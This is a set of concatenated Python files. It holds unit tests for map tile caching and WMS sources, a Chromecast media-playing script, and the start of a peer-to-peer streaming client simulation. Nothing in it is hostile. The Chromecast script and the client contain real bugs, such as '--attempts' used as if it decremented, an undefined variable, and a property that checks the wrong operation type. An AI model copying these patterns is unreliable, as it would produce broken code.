return ImageSource(self._image(query.size))
class TestTileManagerSource(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.source = MockSource()
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
image_opts=self.image_opts,
locker=self.locker,
)
def test_create_tile(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(sorted(self.source.requested),
[((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326)),
((0.0, -90.0, 180.0, 90.0), (256, 256), SRS(4326))])
class MockWMSClient(object):
def __init__(self):
self.requested = []
def retrieve(self, query, format):
self.requested.append((query.bbox, query.size, query.srs))
return create_debug_img(query.size)
class TestTileManagerWMSSource(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[2, 2], meta_buffer=0, image_opts=self.image_opts,
locker=self.locker,
)
def test_same_lock_for_meta_tile(self):
eq_(self.tile_mgr.lock(Tile((0, 0, 1))).lock_file,
self.tile_mgr.lock(Tile((1, 0, 1))).lock_file
)
def test_locks_for_meta_tiles(self):
assert_not_equal(self.tile_mgr.lock(Tile((0, 0, 2))).lock_file,
self.tile_mgr.lock(Tile((2, 0, 2))).lock_file
)
def test_create_tile_first_level(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(self.client.requested,
[((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))])
def test_create_tile(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 2))])
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2)]))
eq_(sorted(self.client.requested),
[((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326))])
def test_create_tiles(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 2)), Tile((2, 0, 2))])
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2),
(2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]))
eq_(sorted(self.client.requested),
[((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326)),
((0.0, -90.0, 180.0, 90.0), (512, 512), SRS(4326))])
def test_load_tile_coords(self):
tiles = self.tile_mgr.load_tile_coords(((0, 0, 2), (2, 0, 2)))
eq_(tiles[0].coord, (0, 0, 2))
assert isinstance(tiles[0].source, ImageSource)
eq_(tiles[1].coord, (2, 0, 2))
assert isinstance(tiles[1].source, ImageSource)
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2),
(2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]))
eq_(sorted(self.client.requested),
[((-180.0, -90.0, 0.0, 90.0), (512, 512), SRS(4326)),
((0.0, -90.0, 180.0, 90.0), (512, 512), SRS(4326))])
class TestTileManagerWMSSourceMinimalMetaRequests(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[2, 2], meta_buffer=10, minimize_meta_requests=True,
locker=self.locker,
)
def test_create_tile_single(self):
# not enabled for single tile requests
self.tile_mgr.creator().create_tiles([Tile((0, 0, 2))])
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (0, 1, 2), (1, 0, 2), (1, 1, 2)]))
eq_(sorted(self.client.requested),
[((-180.0, -90.0, 3.515625, 90.0), (522, 512), SRS(4326))])
def test_create_tile_multiple(self):
self.tile_mgr.creator().create_tiles([Tile((4, 0, 3)), Tile((4, 1, 3)), Tile((4, 2, 3))])
eq_(self.file_cache.stored_tiles,
set([(4, 0, 3), (4, 1, 3), (4, 2, 3)]))
eq_(sorted(self.client.requested),
[((-1.7578125, -90, 46.7578125, 46.7578125), (276, 778), SRS(4326))])
def test_create_tile_multiple_fragmented(self):
self.tile_mgr.creator().create_tiles([Tile((4, 0, 3)), Tile((5, 2, 3))])
eq_(self.file_cache.stored_tiles,
set([(4, 0, 3), (4, 1, 3), (4, 2, 3), (5, 0, 3), (5, 1, 3), (5, 2, 3)]))
eq_(sorted(self.client.requested),
[((-1.7578125, -90, 91.7578125, 46.7578125), (532, 778), SRS(4326))])
class SlowMockSource(MockSource):
supports_meta_tiles = True
def get_map(self, query):
time.sleep(0.1)
return MockSource.get_map(self, query)
class TestTileManagerLocking(object):
def setup(self):
self.tile_dir = tempfile.mkdtemp()
self.file_cache = MockFileCache(self.tile_dir, 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.source = SlowMockSource()
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[2, 2], meta_buffer=0, image_opts=self.image_opts,
locker=self.locker,
)
def test_get_single(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(self.source.requested,
[((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))])
def test_concurrent(self):
def do_it():
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
threads = [threading.Thread(target=do_it) for _ in range(3)]
[t.start() for t in threads]
[t.join() for t in threads]
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(self.file_cache.loaded_tiles, counting_set([(0, 0, 1), (1, 0, 1), (0, 0, 1), (1, 0, 1)]))
eq_(self.source.requested,
[((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))])
assert os.path.exists(self.file_cache.tile_location(Tile((0, 0, 1))))
def teardown(self):
shutil.rmtree(self.tile_dir)
class TestTileManagerMultipleSources(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.source_base = MockSource()
self.source_overlay = MockSource()
self.image_opts = ImageOptions(format='image/png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache,
[self.source_base, self.source_overlay], 'png',
image_opts=self.image_opts,
locker=self.locker,
)
self.layer = CacheMapLayer(self.tile_mgr)
def test_get_single(self):
self.tile_mgr.creator().create_tiles([Tile((0, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1)]))
eq_(self.source_base.requested,
[((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326))])
eq_(self.source_overlay.requested,
[((-180.0, -90.0, 0.0, 90.0), (256, 256), SRS(4326))])
class SolidColorMockSource(MockSource):
def __init__(self, color='#ff0000'):
MockSource.__init__(self)
self.color = color
def _image(self, size):
return Image.new('RGB', size, self.color)
class TestTileManagerMultipleSourcesWithMetaTiles(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.source_base = SolidColorMockSource(color='#ff0000')
self.source_base.supports_meta_tiles = True
self.source_overlay = MockSource()
self.source_overlay.supports_meta_tiles = True
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache,
[self.source_base, self.source_overlay], 'png',
meta_size=[2, 2], meta_buffer=0,
locker=self.locker,
)
def test_merged_tiles(self):
tiles = self.tile_mgr.creator().create_tiles([Tile((0, 0, 1)), Tile((1, 0, 1))])
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(self.source_base.requested,
[((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))])
eq_(self.source_overlay.requested,
[((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326))])
hist = tiles[0].source.as_image().histogram()
# lots of red (base), but not everything (overlay)
assert 55000 < hist[255] < 60000 # red = 0xff
assert 55000 < hist[256] # green = 0x00
assert 55000 < hist[512] # blue = 0x00
@raises(ValueError)
def test_sources_with_mixed_support_for_meta_tiles(self):
self.source_base.supports_meta_tiles = False
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache,
[self.source_base, self.source_overlay], 'png',
meta_size=[2, 2], meta_buffer=0,
locker=self.locker)
def test_sources_with_no_support_for_meta_tiles(self):
self.source_base.supports_meta_tiles = False
self.source_overlay.supports_meta_tiles = False
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache,
[self.source_base, self.source_overlay], 'png',
meta_size=[2, 2], meta_buffer=0,
locker=self.locker)
assert self.tile_mgr.meta_grid is None
default_image_opts = ImageOptions(resampling='bicubic')
class TestCacheMapLayer(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.image_opts = ImageOptions(resampling='nearest')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[2, 2], meta_buffer=0, image_opts=self.image_opts,
locker=self.locker)
self.layer = CacheMapLayer(self.tile_mgr, image_opts=default_image_opts)
def test_get_map_small(self):
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png'))
eq_(self.file_cache.stored_tiles, set([(0, 0, 1), (1, 0, 1)]))
eq_(result.size, (300, 150))
def test_get_map_large(self):
# gets next resolution layer
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (600, 300), SRS(4326), 'png'))
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2),
(2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]))
eq_(result.size, (600, 300))
def test_transformed(self):
result = self.layer.get_map(MapQuery(
(-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913), 'png'))
eq_(self.file_cache.stored_tiles,
set([(0, 0, 2), (1, 0, 2), (0, 1, 2), (1, 1, 2),
(2, 0, 2), (3, 0, 2), (2, 1, 2), (3, 1, 2)]))
eq_(result.size, (500, 500))
def test_single_tile_match(self):
result = self.layer.get_map(MapQuery(
(0.001, 0, 90, 90), (256, 256), SRS(4326), 'png', tiled_only=True))
eq_(self.file_cache.stored_tiles,
set([(3, 0, 2), (2, 0, 2), (3, 1, 2), (2, 1, 2)]))
eq_(result.size, (256, 256))
@raises(MapBBOXError)
def test_single_tile_no_match(self):
self.layer.get_map(MapQuery(
(0.1, 0, 90, 90), (256, 256), SRS(4326), 'png', tiled_only=True))
def test_get_map_with_res_range(self):
res_range = resolution_range(1000, 10)
self.source = WMSSource(self.client, res_range=res_range)
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[2, 2], meta_buffer=0, image_opts=self.image_opts,
locker=self.locker)
self.layer = CacheMapLayer(self.tile_mgr, image_opts=default_image_opts)
try:
result = self.layer.get_map(MapQuery(
(-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913), 'png'))
except BlankImage:
pass
else:
assert False, 'expected BlankImage exception'
eq_(self.file_cache.stored_tiles, set())
result = self.layer.get_map(MapQuery(
(0, 0, 10000, 10000), (50, 50),
SRS(900913), 'png'))
eq_(self.file_cache.stored_tiles,
set([(512, 257, 10), (513, 256, 10), (512, 256, 10), (513, 257, 10)]))
eq_(result.size, (50, 50))
class TestCacheMapLayerWithExtent(object):
def setup(self):
self.file_cache = MockFileCache('/dev/null', 'png', lock_dir=tmp_lock_dir)
self.grid = TileGrid(SRS(4326), bbox=[-180, -90, 180, 90])
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.image_opts = ImageOptions(resampling='nearest', format='png')
self.locker = TileLocker(tmp_lock_dir, 10, "id")
self.tile_mgr = TileManager(self.grid, self.file_cache, [self.source], 'png',
meta_size=[1, 1], meta_buffer=0, image_opts=self.image_opts,
locker=self.locker)
self.layer = CacheMapLayer(self.tile_mgr, image_opts=default_image_opts)
self.layer.extent = BBOXCoverage([0, 0, 90, 45], SRS(4326)).extent
def test_get_outside_extent(self):
assert_raises(BlankImage, self.layer.get_map, MapQuery((-180, -90, 0, 0), (300, 150), SRS(4326), 'png'))
def test_get_map_small(self):
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png'))
eq_(self.file_cache.stored_tiles, set([(1, 0, 1)]))
# source requests one tile (no meta-tiling configured)
eq_(self.client.requested, [((0.0, -90.0, 180.0, 90.0), (256, 256), SRS('EPSG:4326'))])
eq_(result.size, (300, 150))
def test_get_map_small_with_source_extent(self):
self.source.extent = BBOXCoverage([0, 0, 90, 45], SRS(4326)).extent
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png'))
eq_(self.file_cache.stored_tiles, set([(1, 0, 1)]))
# source requests one tile (no meta-tiling configured) limited to source.extent
eq_(self.client.requested, [((0, 0, 90, 45), (128, 64), (SRS(4326)))])
eq_(result.size, (300, 150))
class TestDirectMapLayer(object):
def setup(self):
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.layer = DirectMapLayer(self.source, GLOBAL_GEOGRAPHIC_EXTENT)
def test_get_map(self):
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png'))
eq_(self.client.requested, [((-180, -90, 180, 90), (300, 150), SRS(4326))])
eq_(result.size, (300, 150))
def test_get_map_mercator(self):
result = self.layer.get_map(MapQuery(
(-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913), 'png'))
eq_(self.client.requested,
[((-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913))])
eq_(result.size, (500, 500))
class TestDirectMapLayerWithSupportedSRS(object):
def setup(self):
self.client = MockWMSClient()
self.source = WMSSource(self.client)
self.layer = DirectMapLayer(self.source, GLOBAL_GEOGRAPHIC_EXTENT)
def test_get_map(self):
result = self.layer.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326), 'png'))
eq_(self.client.requested, [((-180, -90, 180, 90), (300, 150), SRS(4326))])
eq_(result.size, (300, 150))
def test_get_map_mercator(self):
result = self.layer.get_map(MapQuery(
(-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913), 'png'))
eq_(self.client.requested,
[((-20037508.34, -20037508.34, 20037508.34, 20037508.34), (500, 500),
SRS(900913))])
eq_(result.size, (500, 500))
class MockHTTPClient(object):
def __init__(self):
self.requested = []
def open(self, url, data=None):
self.requested.append(url)
w = int(re.search(r'width=(\d+)', url, re.IGNORECASE).group(1))
h = int(re.search(r'height=(\d+)', url, re.IGNORECASE).group(1))
format = re.search(r'format=image(/|%2F)(\w+)', url, re.IGNORECASE).group(2)
transparent = re.search(r'transparent=(\w+)', url, re.IGNORECASE)
transparent = True if transparent and transparent.group(1).lower() == 'true' else False
result = BytesIO()
create_debug_img((int(w), int(h)), transparent).save(result, format=format)
result.seek(0)
result.headers = {'Content-type': 'image/'+format}
return result
class TestWMSSourceTransform(object):
def setup(self):
self.http_client = MockHTTPClient()
self.req_template = WMS111MapRequest(url='http://localhost/service?', param={
'format': 'image/png', 'layers': 'foo'
})
self.client = WMSClient(self.req_template, http_client=self.http_client)
self.source = WMSSource(self.client, supported_srs=[SRS(4326)],
image_opts=ImageOptions(resampling='bilinear'))
def test_get_map(self):
self.source.get_map(MapQuery((-180, -90, 180, 90), (300, 150), SRS(4326)))
assert query_eq(self.http_client.requested[0], "http://localhost/service?"
"layers=foo&width=300&version=1.1.1&bbox=-180,-90,180,90&service=WMS"
"&format=image%2Fpng&styles=&srs=EPSG%3A4326&request=GetMap&height=150")
def test_get_map_transformed(self):
self.source.get_map(MapQuery(
(556597, 4865942, 1669792, 7361866), (300, 150), SRS(900913)))
assert wms_query_eq(self.http_client.requested[0], "http://localhost/service?"
"layers=foo&width=300&version=1.1.1"
"&bbox=4.99999592195,39.9999980766,14.999996749,54.9999994175&service=WMS"
"&format=image%2Fpng&styles=&srs=EPSG%3A4326&request=GetMap&height=450")
class TestWMSSourceWithClient(object):
def setup(self):
self.req_template = WMS111MapRequest(
url='http://%s:%d/service?' % TEST_SERVER_ADDRESS,
param={'format': 'image/png', 'layers': 'foo'})
self.client = WMSClient(self.req_template)
self.source = WMSSource(self.client)
def test_get_map(self):
with tmp_image((512, 512)) as img:
expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326&styles='
'&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512'},
{'body': img.read(), 'headers': {'content-type': 'image/png'}})
with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]):
q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326))
result = self.source.get_map(q)
assert isinstance(result, ImageSource)
eq_(result.size, (512, 512))
assert is_png(result.as_buffer(seekable=True))
eq_(result.as_image().size, (512, 512))
def test_get_map_non_image_content_type(self):
with tmp_image((512, 512)) as img:
expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326&styles='
'&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512'},
{'body': img.read(), 'headers': {'content-type': 'text/plain'}})
with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]):
q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326))
try:
self.source.get_map(q)
except SourceError as e:
assert 'no image returned' in e.args[0]
else:
assert False, 'no SourceError raised'
def test_basic_auth(self):
http_client = HTTPClient(self.req_template.url, username='foo', password='bar@')
self.client.http_client = http_client
def assert_auth(req_handler):
assert 'Authorization' in req_handler.headers
auth_data = req_handler.headers['Authorization'].split()[1]
auth_data = base64.b64decode(auth_data.encode('utf-8')).decode('utf-8')
eq_(auth_data, 'foo:bar@')
return True
expected_req = ({'path': r'/service?LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326'
'&VERSION=1.1.1&BBOX=0.0,10.0,10.0,20.0&WIDTH=512&STYLES=',
'require_basic_auth': True,
'req_assert_function': assert_auth},
{'body': b'no image', 'headers': {'content-type': 'image/png'}})
with mock_httpd(TEST_SERVER_ADDRESS, [expected_req]):
q = MapQuery((0.0, 10.0, 10.0, 20.0), (512, 512), SRS(4326))
self.source.get_map(q)
TESTSERVER_URL = 'http://%s:%d' % TEST_SERVER_ADDRESS
class TestWMSSource(object):
def setup(self):
self.req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo', param={'layers':'foo'})
self.http = MockHTTPClient()
self.wms = WMSClient(self.req, http_client=self.http)
self.source = WMSSource(self.wms, supported_srs=[SRS(4326)],
image_opts=ImageOptions(resampling='bilinear'))
def test_request(self):
req = MapQuery((-180.0, -90.0, 180.0, 90.0), (512, 256), SRS(4326), 'png')
self.source.get_map(req)
eq_(len(self.http.requested), 1)
assert_query_eq(self.http.requested[0],
TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=256&SRS=EPSG%3A4326'
'&VERSION=1.1.1&BBOX=-180.0,-90.0,180.0,90.0&WIDTH=512&STYLES=')
def test_transformed_request(self):
req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(900913), 'png')
resp = self.source.get_map(req)
eq_(len(self.http.requested), 1)
assert wms_query_eq(self.http.requested[0],
TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326'
'&VERSION=1.1.1&WIDTH=512&STYLES='
'&BBOX=-1.79663056824,-1.7963362121,1.79663056824,1.7963362121')
img = resp.as_image()
assert img.mode in ('P', 'RGB')
def test_similar_srs(self):
# request in 3857 and source supports only 900913
# 3857 and 900913 are equal but the client requests must use 900913
self.req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo',
param={'layers':'foo', 'transparent': 'true'})
self.wms = WMSClient(self.req, http_client=self.http)
self.source = WMSSource(self.wms, supported_srs=[SRS(900913)],
image_opts=ImageOptions(resampling='bilinear'))
req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(3857), 'png')
self.source.get_map(req)
eq_(len(self.http.requested), 1)
assert_query_eq(self.http.requested[0],
TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A900913'
'&VERSION=1.1.1&WIDTH=512&STYLES=&transparent=true'
'&BBOX=-200000,-200000,200000,200000')
def test_transformed_request_transparent(self):
self.req = WMS111MapRequest(url=TESTSERVER_URL + '/service?map=foo',
param={'layers':'foo', 'transparent': 'true'})
self.wms = WMSClient(self.req, http_client=self.http)
self.source = WMSSource(self.wms, supported_srs=[SRS(4326)],
image_opts=ImageOptions(resampling='bilinear'))
req = MapQuery((-200000, -200000, 200000, 200000), (512, 512), SRS(900913), 'png')
resp = self.source.get_map(req)
eq_(len(self.http.requested), 1)
assert wms_query_eq(self.http.requested[0],
TESTSERVER_URL+'/service?map=foo&LAYERS=foo&SERVICE=WMS&FORMAT=image%2Fpng'
'&REQUEST=GetMap&HEIGHT=512&SRS=EPSG%3A4326'
'&VERSION=1.1.1&WIDTH=512&STYLES=&transparent=true'
'&BBOX=-1.79663056824,-1.7963362121,1.79663056824,1.7963362121')
img = resp.as_image()
assert img.mode in ('P', 'RGBA')
img = img.convert('RGBA')
eq_(img.getpixel((5, 5))[3], 0)
class MockLayer(object):
def __init__(self):
self.requested = []
def get_map(self, query):
self.requested.append((query.bbox, query.size, query.srs))
class TestResolutionConditionalLayers(object):
def setup(self):
self.low = MockLayer()
self.low.transparent = False #TODO
self.high = MockLayer()
self.layer = ResolutionConditional(self.low, self.high, 10, SRS(900913),
GLOBAL_GEOGRAPHIC_EXTENT)
def test_resolution_low(self):
self.layer.get_map(MapQuery((0, 0, 10000, 10000), (100, 100), SRS(900913)))
assert self.low.requested
assert not self.high.requested
def test_resolution_high(self):
self.layer.get_map(MapQuery((0, 0, 100, 100), (100, 100), SRS(900913)))
assert not self.low.requested
assert self.high.requested
def test_resolution_match(self):
self.layer.get_map(MapQuery((0, 0, 10, 10), (100, 100), SRS(900913)))
assert not self.low.requested
assert self.high.requested
def test_resolution_low_transform(self):
self.layer.get_map(MapQuery((0, 0, 0.1, 0.1), (100, 100), SRS(4326)))
assert self.low.requested
assert not self.high.requested
def test_resolution_high_transform(self):
self.layer.get_map(MapQuery((0, 0, 0.005, 0.005), (100, 100), SRS(4326)))
assert not self.low.requested
assert self.high.requested
class TestSRSConditionalLayers(object):
def setup(self):
self.l4326 = MockLayer()
self.l900913 = MockLayer()
self.l32632 = MockLayer()
self.layer = SRSConditional([
(self.l4326, (SRS('EPSG:4326'),)),
(self.l900913, (SRS('EPSG:900913'), SRS('EPSG:31467'))),
(self.l32632, (SRSConditional.PROJECTED,)),
], GLOBAL_GEOGRAPHIC_EXTENT)
def test_srs_match(self):
assert self.layer._select_layer(SRS(4326)) == self.l4326
assert self.layer._select_layer(SRS(900913)) == self.l900913
assert self.layer._select_layer(SRS(31467)) == self.l900913
def test_srs_match_type(self):
assert self.layer._select_layer(SRS(31466)) == self.l32632
assert self.layer._select_layer(SRS(32633)) == self.l32632
def test_no_match_first_type(self):
assert self.layer._select_layer(SRS(4258)) == self.l4326
class TestNeastedConditionalLayers(object):
def setup(self):
self.direct = MockLayer()
self.l900913 = MockLayer()
self.l4326 = MockLayer()
self.layer = ResolutionConditional(
SRSConditional([
(self.l900913, (SRS('EPSG:900913'),)),
(self.l4326, (SRS('EPSG:4326'),))
], GLOBAL_GEOGRAPHIC_EXTENT),
self.direct, 10, SRS(900913), GLOBAL_GEOGRAPHIC_EXTENT
)
def test_resolution_high_900913(self):
self.layer.get_map(MapQuery((0, 0, 100, 100), (100, 100), SRS(900913)))
assert self.direct.requested
def test_resolution_high_4326(self):
self.layer.get_map(MapQuery((0, 0, 0.0001, 0.0001), (100, 100), SRS(4326)))
assert self.direct.requested
def test_resolution_low_4326(self):
self.layer.get_map(MapQuery((0, 0, 10, 10), (100, 100), SRS(4326)))
assert self.l4326.requested
def test_resolution_low_projected(self):
self.layer.get_map(MapQuery((0, 0, 10000, 10000), (100, 100), SRS(31467)))
assert self.l900913.requested
|
ring.py
|
#!/usr/bin/env python
import sys, getopt
import time
import pychromecast
import threading
def playAudio(cast, mediaList, mediaformat, repeat):
try:
cast.wait()
mc = cast.media_controller;
mc.stop();
print(cast.device)
for ii in xrange(repeat):
if repeat != 1:
print ii
for media in mediaList:
mc.play_media(media, mediaformat);
attempts = 10
while attempts > 0 and mc.status.player_state in [u'UNKNOWN', u'IDLE']:
print(mc.status)
--attempts
time.sleep(1)
attempts = 30
while attempts > 0 and mc.status.player_state in [u'PLAYING', u'BUFFERING']:
print(mc.status)
time.sleep(1)
except KeyboardInterrupt:
thread.interrupt_main();
def runThreads(threads):
for thread in threads:
thread.start();
for thread in threads:
thread.join();
def ring(device, mediaList, mediaformat, repeat):
if device == None:
# All available devices
devices = pychromecast.get_chromecasts_as_dict().values()
else:
cast = None;
sleep = 0
attempts = 10
while attempts > 0 and cast == None:
if sleep > 0:
time.sleep(sleep)
print("Retrying " + device + "...");
cast = pychromecast.get_chromecast(friendly_name=device)
sleep = 1
--attempts
threads = map((lambda cast: threading.Thread(target = playAudio, args = [cast, mediaList, mediaformat, repeat])), devices);
runThreads(threads);
if __name__ == "__main__":
device=None
mediaformat='video/mp4'
repeat=1
myopts, args = getopt.getopt(sys.argv[1:], "d:m:r:");
for o, a in myopts:
if o == '-d':
device = a
elif o == '-m':
mediaformat = a
elif o == '-r':
repeat = int(a)
devices = None
ring(device, args, mediaformat, repeat);
|
p2p_client.py
|
from threading import Thread
import time, uuid
import numpy as np
from ..utils.flags import DEBUG
class VCROperation:
def __init__(self, type, speed, offset) -> None:
self.type = type
self.speed = speed
self.seek_offset = offset
@property
def is_forward(self):
return self.type == "farword"
@property
def is_rewind(self):
return self.type == "rewind"
@property
def is_seek(self):
return self.type == "rewind"
class Client:
"""A node from a skip list"""
def __init__(self, playback_offset = 0.0, buffer_size = 10, total_stream_length = 100, vcr_operation = None, vcr_operation_percent_ofstream = 0):
self._id = uuid.uuid4()
self._vcr_operation = vcr_operation
self._vcr_operation_percent_ofstream = vcr_operation_percent_ofstream
self._total_stream_length = total_stream_length
self._playback_offset = playback_offset
self._buffer_size = buffer_size
self._buffer = (playback_offset, playback_offset+buffer_size)
self._speed = 1
self._is_playing = False
self._is_forward = True
self._play_thread = None
self._buffering_thread = None
self._misses = {}
self._hits = {}
self._vcr_data = {}
self._buffering_duration = 0.01
self._tik_duration = 0.005
self.time = 0
def __repr__(self) -> str:
return str(self._id)
def __eq__(self, other):
if not isinstance(other, Client):
# don't attempt to compare against unrelated types
return NotImplemented
return self._id == other._id
def __str__(self):
msg = "rewing"
if self._is_forward:
msg = "forward"
return "{}\nwith buffer {}\nplaying {}: {}\nat speed {}".format(self._id, self._buffer, msg, self._playback_offset, self._speed)
def start_timer(self):
def _run():
while True:
time.sleep(self._tik_duration)
self.time+=1
self._timer_theread = Thread(target=_run, daemon=True)
self._timer_theread.start()
def _play(self):
while self._is_playing:
# Hit / Mis - SMR
# print("crack")
if self._playback_offset > self._buffer[1] or self._playback_offset < self._buffer[0]:
self._misses[self.time] = self._misses.get(self.time,0) + 1
self.random_seek(self._playback_offset)
continue
else:
self._hits[self.time] = self._hits.get(self.time,0) + 1
# mimik play action
if DEBUG:
print(self)
# Handling VCR Operations
self._handle_vcr_op_if_needed()
# Advance to next segment
if self._is_forward:
self._playback_offset += 1 * self._speed
else:
self._playback_offset -= 1 * self._speed
# Validating end/begining of stream
if self._playback_offset >= self._total_stream_length:
if DEBUG:
print("Got to END of the stream {}".format(self._playback_offset))
self._is_playing = False
break
if self._playback_offset <= 0:
if DEBUG:
print("Got to BEGINING of the stream {}".format(self._playback_offset))
self._is_playing = False
break
# Validate end of local buffer, i.e needs to random seek
if self._buffer[1] <= self._playback_offset and self._is_forward:
self.random_seek(self._playback_offset)
if DEBUG:
print("forward: end of buffer need to go to next node")
if self._playback_offset <= self._buffer[0] and not self._is_forward:
self.random_seek(self._playback_offset)
